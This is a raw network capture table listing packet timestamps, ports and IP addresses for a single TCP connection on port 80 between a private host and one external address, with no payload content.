Oct 1, 2024 16:50:08.682559013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682569027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682569027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682571888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682581902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682590961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682591915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682607889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682620049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682624102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682631016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682646990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682657957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682661057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682667971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682678938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682682037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682688951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682698965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682701111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682708979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682719946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682730913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.682739019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682764053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.682764053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683043957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683062077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683075905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683110952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683124065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683131933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683134079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683136940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683139086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683140993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683190107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683190107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683329105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683341980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683352947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683365107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683377028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683381081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683393955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683407068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683408022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683417082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683429956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683440924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683449984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683449984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683453083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683464050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683469057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683475018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683486938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683502913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683515072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683516026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683526039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683536053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683543921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683543921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683547974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683558941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683569908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683576107 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683581114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683624029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683624029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683736086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683751106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683762074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683772087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683782101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683793068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683794022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683794022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683803082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683813095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683821917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683831930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683836937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683837891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683841944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683852911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683852911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.683864117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683875084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683886051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.683891058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.687623978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.687623978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715492010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715516090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715528011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715610027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715621948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715631962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715650082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715703964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715703964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715703964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715703964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715718985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715730906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715740919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715747118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715759039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715764046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715770006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715791941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715796947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715800047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715802908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715814114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715825081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715826988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715847969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715867996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.715913057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715919018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715924978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715930939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.715936899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716005087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716548920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716582060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716593981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716623068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716623068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716675043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716686010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716706991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716722012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716730118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716736078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716748953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716748953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716779947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716849089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716859102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716870070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716891050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716922045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.716953039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716963053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716974020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716984034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.716995955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.717004061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.717008114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.717012882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.717021942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.717024088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.717032909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.717044115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.717070103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.717070103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.717083931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.770689011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770713091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770724058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770773888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770785093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770796061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770807028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770823956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770834923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770845890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770853996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.770881891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770891905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770901918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770914078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770919085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.770926952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770936966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770947933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.770948887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770968914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.770988941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.770999908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771004915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771009922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771022081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771059036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771059036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771106958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771117926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771131992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771136999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771147966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771163940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771166086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771188021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771188021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771215916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771400928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771411896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771423101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771433115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771445036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771462917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771462917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771521091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771671057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771682978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771692991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771711111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771718979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771730900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771734953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771744967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771765947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771796942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771809101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771817923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771823883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771828890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771845102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771856070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771858931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771859884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771859884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771867037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771878958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771893024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771915913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771923065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771923065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771933079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771945953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771953106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771960020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.771984100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.771984100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772021055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772032976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772037029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772047997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772049904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772059917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772072077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772109985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772109985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772140980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772152901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772164106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772173882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772185087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772196054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772205114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772205114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772206068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772217035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772238016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772239923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772249937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772259951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772270918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772273064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772281885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772291899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772296906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772330999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772330999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772365093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772383928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772394896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772406101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772413015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772416115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772428989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772439003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772440910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772452116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.772471905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.772521973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.814852953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.814934969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.814948082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.814985991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815005064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815112114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815124035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815134048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815170050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815200090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815212011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815283060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815308094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815361023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815373898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815402031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815402031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815421104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815470934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815476894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815488100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815498114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.815517902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815541983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.815944910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816008091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816025019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816036940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816087961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816102028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816114902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816124916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816134930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816181898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816181898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816601038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816657066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816668987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816694021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816694021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816725969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816745996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816759109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816768885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816780090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816801071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816801071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816818953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816821098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816914082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816930056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.816942930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.816972017 CEST	49704	80	192.168.2.5	185.215.113.37
